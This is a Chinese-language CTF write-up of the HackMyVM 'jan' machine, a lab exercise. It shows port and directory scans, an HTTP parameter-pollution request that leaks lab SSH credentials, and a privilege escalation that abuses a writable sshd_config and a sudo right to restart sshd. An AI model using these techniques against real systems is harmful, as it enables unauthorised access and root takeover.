跳过正文
HYH’s Blog

HackMyVM-jan

·173 字·1 分钟
Hackmyvm Hackmyvm Linux
HYH
作者
HYH
一名专注于网络安全、渗透测试与 CTF 挑战的技术爱好者,热衷于记录实战经验、分享工具与技术,致力于持续学习与成长。
目录

Box Info
#

OS Linux
Difficulty Easy

Nmap
# 

[root@kali] /home/kali  
❯ nmap 192.168.56.144  -p-

PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http-proxy

Gobuster
# 

[root@kali] /home/kali  
❯ gobuster dir -u http://192.168.56.144:8080/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,txt --exclude-length 45
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.144:8080/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] Exclude Length:          45
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/redirect             (Status: 400) [Size: 24]
/robots.txt           (Status: 200) [Size: 16]
Progress: 97322 / 882244 (11.03%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 100724 / 882244 (11.42%)
===============================================================
Finished
===============================================================

发现一个**/redirect路由,并且需要url**参数

http://192.168.56.144:8080/robots.txt

/redirect
/credz

尝试进行将url参数赋值为**/credz**

这里应该是存在一个参数覆盖的问题

http://192.168.56.144:8080/redirect?url=/credz&url=/credz

#得到凭证
ssh/EazyLOL

Root
# 

jan:/opt$ sudo -l
Matching Defaults entries for ssh on jan:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for ssh:
    Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User ssh may run the following commands on jan:
    (root) NOPASSWD: /sbin/service sshd restart

发现配置文件是可以写入的

修改**/etc/ssh/sshd_configbanner**

然后重启服务,尝试ssh登录root,可以读取

要获取到Rootshell的话,需要修改下面几个地方

其中key是从kali中的公钥中获取到的

Summary
#

User:通过变量覆盖解析获取到ssh登录凭证。

Root:修改ssh配置文件中的默认密钥位置,获取到root

Reply by Email